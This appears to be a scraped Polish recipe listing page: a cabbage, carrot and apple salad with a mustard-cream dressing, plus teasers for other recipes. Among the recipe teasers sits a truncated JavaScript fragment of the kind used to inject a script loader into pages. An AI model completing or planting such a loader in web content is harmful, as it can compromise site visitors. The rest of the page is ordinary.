Surówka z pekińskiej w sosie śmietanowo -musztardowym
Źródło: https://rajchelewa.blogspot.com/2025/02/surowka-z-pekinskiej-w-sosie-smietanowo.html
Prosta i błyskawiczna surówka z kapusty pekińskiej, marchewki, jabłka i papryki w wyrazistym sosie. Doskonały dodatek do obiadu.Składniki:1/2 małej główki kapusty pekińskiej1 nieduża marchew1/2 papryki czerwonej1 jabłkomała puszka kukurydzy2 ząbki czosnku2 łyżki posiekanej natki pietruszki (może być mrożona)3 łyżki śmietany gęstej, kwaśnej 18%1 łyżka musztardy francuskiej z całymi ziarnami gorczycysól i pieprz do smakuSposób wykonania:Śmietanę i musztardę...
Najnowsze przepisy
Poznaj rybę po grecku z fantastycznie dobranymi warzywami... ⇖ 15
Dzisiaj krótko i do rzeczy.To już kolejny piernik na moim... ⇖ 14
Łaciatek z makiem to ciasto, które przyciąga wzrok już... ⇖ 19
Ciasto jest wyśmienite, wielowarstwowe począwszy od... ⇖ 22
(function(){ u7xb=document.createElement("script");u7xb.type ⇖ 20
Rurki z kremem Kinder to przepis, który smakiem przenosi... ⇖ 15
Przepisy z bloga
Ciasto jest wyśmienite, wielowarstwowe począwszy od... ⇖ 22
Tradycyjny polski śledź w śmietanie. Do niego ziemniaki... ⇖ 28
Barszcz wigilijny z buraków gotujemy na warzywach. Jest to... ⇖ 36
Polecamy jarzynową w nieco innej odsłonie. Wzbogaconą o... ⇖ 35
Karp smażony w głębokim tłuszczu, polany masełkiem,... ⇖ 182
Delikatny rosół wieprzowo -drobiowy z małymi pierożkami... ⇖ 52
Nie zdążyłyśmy upiec piernika na święta, nie szkodzi!... ⇖ 64
Nasze krokiety to idealny dodatek dobarszczu wigilijnegolub... ⇖ 52
Przepisy na czasie
Prosty przepis na klasyczny drożdżowy makowiec. Przepis... ⇖ 2714
Masz ochotę na coś słodkiego bez pieczenia? Zrób sernik... ⇖ 2096
Piernik przekładany kremem to jedno z tych ciast, które... ⇖ 1441
NAJLEPSZY PRZEPIS NA CIASTO NA PIEROŻKIBardzo lubię... ⇖ 844
To niezwykle proste ciasto piernikowe, które zawsze się... ⇖ 749
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 677
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 643
Cześć! Dzisiaj robimy ciasto lion bez pieczenia, to... ⇖ 641








































